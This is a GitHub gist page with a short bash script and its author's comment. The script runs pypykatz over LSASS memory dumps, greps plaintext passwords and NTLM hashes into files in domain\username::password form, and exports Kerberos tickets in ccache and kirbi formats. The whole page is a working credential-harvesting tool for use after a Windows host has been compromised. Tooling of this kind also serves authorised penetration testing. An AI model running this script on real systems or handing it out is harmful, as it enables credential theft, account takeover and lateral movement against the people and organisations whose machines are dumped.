Skip to content

Instantly share code, notes, and snippets.

@seajaysec
Last active January 21, 2024 00:03
Show Gist options
  • Save seajaysec/1a27c632237298e9bb3b1a3dc8e4e117 to your computer and use it in GitHub Desktop.
Save seajaysec/1a27c632237298e9bb3b1a3dc8e4e117 to your computer and use it in GitHub Desktop.
super rough plaintext secret parser for pypykatz dumps
#!/bin/bash
# prereqs: pypykatz, all the dumps in current working dir
mkdir ./ppktz_tickets 2>/dev/null
ext='.dmp'
for i in *$ext; do
txtfile=${i::-3}txt
secrets=${i::-3}secrets
pypykatz lsa minidump $i -o $txtfile -k ./ppktz_tickets/;
grep 'password' $txtfile -B 2 | grep -v 'None' | grep 'password' -B 1 | sed -e "s#--##g" | sed '/^$/d' | sed '$!N;s/\n/ /' | sed 's/username //g' | sed 's/password /::/g' | tr -d '[:blank:]' | sort -u > $secrets
grep 'NT:' $txtfile -B 3 | grep -v "LM: NA" | cut -d ":" -f 2,3 | sed -e "s#--##g" | sed '/^$/d' | tr -d '[:blank:]' | sed 's/NT://g' | awk '{ printf "%s", $0; if (NR % 3 == 0) print ""; else printf ":" }' | awk -v OFS=":" -F":" '{print $2, $1, $3}' | sed 's/:/\\/' | sed 's/:/::/' | grep -v "\\\$" | sort -u >> $secrets
sort -u $secrets -o $secrets
done
# deletes empty secrets files
find ./*.secrets -type f -empty -delete
echo 'plaintext and hash output:' && wc -l *.secrets | grep total
echo 'ccache tickets output:' && /bin/ls -l ./ppktz_tickets/*.ccache | wc -l
echo 'kirbi tickets output' && /bin/ls -l ./ppktz_tickets/*.kirbi | wc -l
@seajaysec
Copy link
Author

seajaysec commented Sep 20, 2019

takes raw lsass output files, uses pypykatz to output text, greps out plaintext creds and NTLM hashes, then sorts for uniques. includes pypykatz flags to output ccache and kirbi tickets as well.

output format:
domain\username::password

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment